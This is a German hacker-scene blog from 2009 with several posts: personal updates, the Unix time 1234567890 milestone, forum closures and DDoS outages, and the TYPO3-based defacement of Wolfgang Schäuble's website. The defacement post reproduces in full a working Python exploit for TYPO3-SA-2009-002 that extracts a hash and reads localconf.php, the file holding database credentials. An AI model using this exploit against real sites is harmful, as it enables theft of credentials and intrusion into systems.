Gift for J0hn.X3r

Heyho,

nen Kumpel von mir (Alexander aus meiner Klasse :>) hat fuer mich nen kleines Geschenk gezeichnet/gemalt 🙂

Dieses moechte ich euch natuerlich nicht vorenthalten, sondern euch vorstellen:

Na, koennt ihr lesen was dort drauf steht? 🙂

So kleine Info bezueglich dieser Woche.

Punkt 1: Egal wie viele Besucher ich am Tag habe oder auch nicht, ich werde euch nicht mit laestigen Werbelayern von euroclick oder aehnliches belaestigen, d.h. ich bleib Werbefrei! 😀 Natuerlich zaehlt dazu nicht, dass unterstuetzen / vorstellen von anderen Projekten/Blogs/Foren/…

Punkt 2: Diese Woche ist leider verdammt viel los und ich weiß nicht ob ich dazu komme, etwas großes zu posten. Klar wenns nen besonderes Ereignis ist, poste ich es so schnell wie moeglich, aber zu einem Tutorial oder aehmliches werd ich diese Woche denk ich nicht kommen. Dafuer dann am Freitag bzw. eher Samstag umso mehr 🙂

Neues Theme and more :D

heyho,

aufgrund dessen, dass meine Einzelbeitragsdarstellung zum Teil extrem naja.. schlecht aussah, hab ich mir ueberlegt das Theme zu wechseln. Hab mir nun dieses Ausgesucht und finde es ganz in Ordnung. Der Header bleibt natuerlich nicht so, ich werd das im Laufe des heutigen Tages noch aendern bzw anpassen. Am wichtigsten ist mir vorallem das man meine Beitraege nun auch einzelnd lesen kann 🙂

So der zweite Punkt ist, dass vor wenigen Minuten die Unix Zeit, wie im vorherigen Beitrag schon angesprochen, auf 1234567890 stand.

j0hnx3r@j0hnx3r-laptop:~$ date -d @1234567890
Sat Feb 14 00:31:30 CET 2009
j0hnx3r@j0hnx3r-laptop:~$ 

(Jetzt bin ich fast so leet wie heise.de ^^)

So ein Schauspiel erlebt man nicht oft im Leben – das ist quasi wie Geburtstag, Weihnachten und Silvester an einem Tag, was man auch im IRC Channel #1234567890 auf irc.freenode.net beobachten konnte (Mehr als 1100 Besucher).

Ahja ein kleines neues Plugin hab ich auch noch schnell eingefuegt, da ich es toll finde, und zwar werden nun bei Kommentaren immer Land, Browser und OS angezeigt, Interessante Sache find ich 🙂

13. Februar…

… ist ein besonderer Tag.

Es ist nicht nur Freitag der 13. sondern auch “time to party in Wiesbaden”.

Doch warum?

Am 13. Februar 2009 23:31:30 UTC (lokale Ortszeit 14. Februar 2009 0:31:30) springt die Unixzeit auf 1234567890.

Quelle: http://events.ccc.de/2009/01/30/132-time-to-party-in-wiesbaden/

Außerdem wird am 13.02.2009 mein Blog schon einen Monat alt, uiuiui^^

Werd mir was besonderes fuer euch einfallen lassen 😉

Suche uebrigens jemanden der sich mit dem Standard Template von WordPress auskennt, da wie ihr sicher bemerkt habt, bei Einzelbeitraegen das Template viel zu dunkel ist. Wer sich damit auskennt, solle mich bitte mal kontaktieren 🙂

Als zweiten Punkt suche ich uebrigens noch einen tollen “Link me” Banner. Jeder (Hobby) GFXer oder auch normale User welcher mit Photoshop oder aehnlichen Programmen einen Banner erstellen kann, darf mich gerne kontaktieren, ueber ICQ oder eMail unter “Contact”. 🙂

Website von Wolfgang Schäuble defaced

Wie sicherlich einige, oder ich denk mal alle ( 😀 ) mitbekommen haben, wurde die Seite von unserem Innenminister (isser doch, oder?) Wolfgang Schäuble defaced. Grund dafuer war eine Sicherheitsluecke im CMS (Content-Management-System) Typo3.

Die Folgen durch das Ausnutzen der Schwachstelle könnten für den jeweiligen Betreiber weit reichend sein. Grund dafür ist unter anderem der mögliche Zugriff auf die Datei localconf.php. In dieser befindet sich das Passwort für das Installations-Setup sowie der Benutzername und das zugehörige Kennwort für die Datenbank. Nach eingehender Betrachtung konnten die Experten den Fehler ausfindig machen. Dieser soll im Zusammenhang mit der jumpUrl-Funktion zum Analysieren der Webzugriffe bestehen.

Typo3, CMS, Typo, Typo3 LogoLaut den offiziellen Angaben sind die Versionen 3.3.x, 3.5.x, 3.6.x, 3.7.x, 3.8.x, 4.0 bis 4.0.11, 4.1.0 bis 4.1.9, 4.2.0 bis 4.2.5 und die Alphaversion 4.3 von dieser Problematik betroffen. Ein zur Verfügung gestelltes Update auf die Versionen 4.0.12, 4.1.10 und 4.2.6 soll diesem Sachverhalt Abhilfe schaffen.

Quelle: http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Sah dort dann etwa so aus:

Oben ein Link zu Vorratsdatenspeicherung.de/ und Links in der Leiste in Link zum Update auf die Neuste Version und die Bitte, das PW zu aendern.

Ist ja nicht das erste mal, das Schäubles Page defaced wurde, jedoch finde ich das irgendwie sinnlos, da es eher nen Eigentor war und ihn selber nur weiter dazu bringt, mehr auf Ueberwachung zu setzen, damit sowas nicht mehr anonym passieren kann.

Mehr zu dem Thema:
http://computer.t-online.de/c/17/64/27/90/17642790.html
http://www.heise.de/security/Website-von-Wolfgang-Schaeuble-ueber-Typo3-Luecke-gehackt-Update–/news/meldung/132315
http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Laut heise.de war das Passwort “gewinner”, was mich wundert, da das Passwort soviel ich weiß beim Ersten Deface schon gewinner war…

Wer das Typo3 Exploit sehen will:

#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
#       typo3-sa-2009-002.py   (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek

import urllib,re,sys

strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')

def useme():
    print sys.argv[0], ' (with http://)  (defaults to typo3conf/localconf.php)'
    sys.exit(0)

def parsehash(host, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:'})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None

    tmp = strip.match(r)
    if tmp:
        return tmp.group(1)
    else:
        return None

def content(host, hash, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:', 'juHash' : hash})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        print '[+] - content of:', f
        print s.read()
    except:
        print '[!] - FAIL'

def main():
    if len(sys.argv) < 2:
        useme()

    if len(sys.argv) < 3:
        file = 'typo3conf/localconf.php'
    else:
        file = sys.argv[2]

    print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
    print '[+] - checking typo3 installation on...'

    hash = parsehash(sys.argv[1], file)

    if not hash:
        print '[!] - version already fixed or 42 went wrong while trying to get the hash'
        sys.exit(234)

    content(sys.argv[1], hash, file)


if __name__ == '__main__':
    main()

# milw0rm.com [2009-02-10]

http://milw0rm.com/exploits/8038

Wochenuebersicht

Heyho,

hier ist eine kleine Wochen Uebersicht mit nen paar, naja, “News” was in dieser Woche alles vorgefallen ist.

1) Codesoft.cc macht Pause

Codesoft.cc und seine Scene Tools werden ab dem 1. Maerz 2009 bis gegen Herbst/Winter offline gehen.

Warum?

Der Grund für die Pause bin ich (tr1p0d). Ich werde für min. 6 Monate lang weg sein und wärend dieser Zeit hab ich (selbst wenn ich wollte) keine Chance On zu kommen. Wieso das genau muss die Breite Oeffentlichkeit nicht wissen. Es ist einfach so.

Ich habe zuerst gedacht das man evt. nen Nachfolger für mich finden könnte der alles Leitet und ein guter Coder ist. Jedoch habe ich dann das ganze Zerschlagen weil das ganze Team auch einwenig Ausgelaugt ist und wir Gemeinsam Schlussendlich beschlossen haben die Pause einzulegen. Wären dieser Zeit können wir alle wieder Energie und vorallem NEUE Ideen Sammeln. Im Moment kommen viele Projekte hoch wo man aber genau sieht das sie nur ein Abklatsch sind von einem andern wie z.B von Uns. Wir wollen euch aber Neues Bieten und das wird es alles auch geben wenn wir wieder kommen. Kopieren kann jeder, neues schaffen nicht 😉

Jedoch, sie kommen wieder, keine Frage 😉

Quelle: http://board.codesoft.cc/showthread.php?t=6375

2) FrEe-hAcK down?!

FrEe-hAcK.com ist mal wieder down/offline. Doch warum?

Am frühen Montagabend wurde die Last eines Angriffes so groß, das wir den Server vom Netz nehmen mussten. Zwischenzeitlich prasselten ~300mbps auf den Server ein. Fazit, wir mussten die IP nullrouten. Es wird zur Zeit am neuen Server gerarbeitet. Wieviel Zeit wir noch benötigen kann ich leider nicht abschätzen.
Ich hatte gehofft Free-Hack bereits am Dienstag wieder in Betrieb zu nehmen, dem war nicht so. Und das ist auch der Grund wieso hier so spät erst ein Beitrag erscheint. Sollte es Neuigkeiten geben, erfahrt ihr sie hier.

Quelle: http://blog.free-hack.com/?p=37

Jedoch werden sie, laut eigenen Angaben, vielleicht morgen wieder Online kommen 🙂

3) ToKrew.info macht zu

Ein eher nicht so bekanntes Forum macht zu. Alte News aber auch die sollte man erwaehnen und es ist gut, dass der Admin es selber auch eingesehen hat und nicht wie andere reagiert.

Warum?

Dieses Board war als allererstes für die Birfrost-world Mitglieder gedacht .
Ich wollte nie ein eigenes Forum leiten sondern nur meinen Teammembern ein neues zu Hause bieten …
Den ich war S-Mod bei Bifrost und Koksi (Der Admin) hat dieses Projekt total vernachlässigt , bis Dateiload schlussendlich den Server kündigte 😉

Warum Ich nun letzendlich das Projekt TOKREW einstelle:
Ich hab nen Sprung auf meiner KarriereLeiter gemacht und zwar nach oben was aber meine Freizeit ziemlich vermindert .
Da hier aber ehh nicht die Welt los ist hören wir an dieser Stelle auf ich beendige auch so meine Zeit in “der Scene” da Ich mich nun schöneren Dingen im Leben wittme .

Quelle: http://www.tokrew.info/forum/index.php?topic=1098.0

Und nun der letzte Punkt betrifft meinen Blog selber, wie einige mitbekommen haben gab es eine lange Downtime und hier ist ein kleines Statement (Zitat aus dem Newsletter):

Seit nunmehr 48 Stunden stehen alle Server unter DDOS mit mehreren hundert mbits Bandbreite.
Da die Server standartmäßig eine Anbindung von hundert Mbit haben ist eine Abwehr der Angriffe zur Zeit nicht möglich.

Jedoch wird das demnaechst wieder besser werden, denk ich 🙂

Am Wochende kommt vllt Teil 4 von meiner SQL Injections Tutorials Reihe, wenn nicht etwas anderes interessantes 😉

Wuensch euch allen nen schoenes Wochenende 🙂

P.S. Wenn ihr in der naechsten Wochenuebersicht dabei sein wollt, kontaktiert mich, mehr Infos unter “Contact”.